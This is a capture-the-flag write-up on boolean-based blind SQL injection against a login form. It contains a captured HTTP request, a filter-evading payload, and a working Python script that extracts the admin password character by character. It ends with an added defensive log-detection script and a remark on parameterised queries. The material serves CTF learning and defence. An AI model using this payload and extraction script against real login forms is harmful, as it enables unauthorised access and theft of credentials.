Preface
[CTF Learning] Boolean-based blind SQL injection
1. The challenge
Hint: boolean-based blind SQL injection
Description: SQL injection
Opening the challenge shows yet another web login page; from the hint one can guess it is a SQL injection challenge against a POST form.
2. Solution steps
1. Capture the request with Burp Suite
POST /index.php HTTP/1.1
Host: 114.67.246.176:10965
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://114.67.246.176:10965/
Cookie: PHPSESSID=j4u9u18ei1r7serqv1vhg9km34
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
username=admin&password=123
#With username=admin the page says "password error",
#so the username is admin.
#When injecting into username, < > = are all filtered, but "or" is not.
#I used username=a'or(1) or(0)%23 to test for SQL injection.
#The username is deliberately misspelled so that the two responses can be told apart.
Construct the payload
username=admi'or((ascii(substr((select(password))from(1)))-48))%23&password=123
2. Python script
import time
import requests
from requests.adapters import HTTPAdapter

url = "http://pandarking.ctf:10965/index.php"
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE',
    'Connection': 'close',  # the original set s.keep_alive = False, which requests ignores
}

with requests.Session() as s:
    # the original assigned s.adapters.DEFAULT_RETRIES, which has no effect;
    # mounting an adapter is how retries are actually configured
    s.mount('http://', HTTPAdapter(max_retries=5))
    password = "passwd:"
    for i in range(1, 32):          # position inside the password (31 characters)
        for j in range(48, 128):    # candidate ASCII value for that position
            # ascii(byte) - j is 0 only when j is the right value; then the OR is false,
            # the misspelled username does not match, and the page reports it as missing
            sql = "admi'or((ascii(substr((select(password))from({0})))-{1}))--'".format(i, j)
            data = {'username': sql, 'password': "123"}
            try:
                res = s.post(url, data=data, timeout=5, headers=headers)
            except requests.RequestException:
                time.sleep(2)   # one retry after a short pause, as in the original
                res = s.post(url, data=data, timeout=5, headers=headers)
            if 'username does not exist' in res.text:
                password += chr(j)
                print(password)
                break
#Result: passwd:4dcc88f8f1bc05e7c2ad1a60288481a
3. Log in to the admin panel to get the flag
Thanks for reading
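Seen from the defender's side, the probes in this write-up leave an obvious trail in the request log: the username field carries a closing quote, an OR, a chain of MySQL function calls and a comment terminator, and the same session sends it dozens of times with only the numbers changed. The following Python is an added example, not code from the original post; the log format and the sample lines are constructed, and the challenge's `<>=` blacklist is the reason the rule keys on structure rather than on comparison operators.

```python
import re
from collections import Counter
from urllib.parse import parse_qs

# Constructed sample log lines (not from the original post): "client session POST-body".
SAMPLE_LOG = [
    "10.0.0.5 s1 username=admin&password=123",
    "10.0.0.5 s1 username=a'or(1)%23&password=123",
    "10.0.0.5 s1 username=admi'or((ascii(substr((select(password))from(1)))-48))%23&password=123",
    "10.0.0.5 s1 username=admi'or((ascii(substr((select(password))from(1)))-52))--'&password=123",
    "10.0.0.5 s1 username=admi'or((ascii(substr((select(password))from(2)))-100))--'&password=123",
    "10.0.0.9 s2 username=o'brien&password=xyz",
    "10.0.0.9 s2 username=admin&password=hunter2",
]

# The challenge filtered < > = but left OR and MySQL functions usable, so the payload
# compares bytes by subtraction. Match the structure that survives such a filter:
# a quote closing the string followed by OR, a function-call chain, or a trailing
# comment terminator (# or --, optionally re-balancing the quote).
PROBE = re.compile(
    r"'\s*or\s*\(|\b(ascii|substr|select)\s*\(|(#|--)\s*'?\s*$",
    re.IGNORECASE,
)

def username_of(body: str) -> str:
    """Percent-decode the form body and return the submitted username ('' if absent)."""
    return parse_qs(body, keep_blank_values=True).get("username", [""])[0]

def is_probe(username: str) -> bool:
    """True when the username looks like a boolean-blind SQL probe rather than a login."""
    return PROBE.search(username) is not None

def analyze(lines, burst=3):
    """Return flagged (session, username) pairs and the sessions with >= burst probes."""
    flagged, per_session = [], Counter()
    for line in lines:
        _client, session, body = line.split(" ", 2)
        user = username_of(body)
        if is_probe(user):
            flagged.append((session, user))
            per_session[session] += 1
    bursts = {s: n for s, n in per_session.items() if n >= burst}
    return flagged, bursts

if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

The per-session count matters because each extracted character costs up to 80 near-identical requests; a single flagged request is an alert, a burst is an extraction in progress. A rule like this is a detection, not a fix: the oracle only goes away when the login query binds the username as a parameter instead of splicing it into the SQL string.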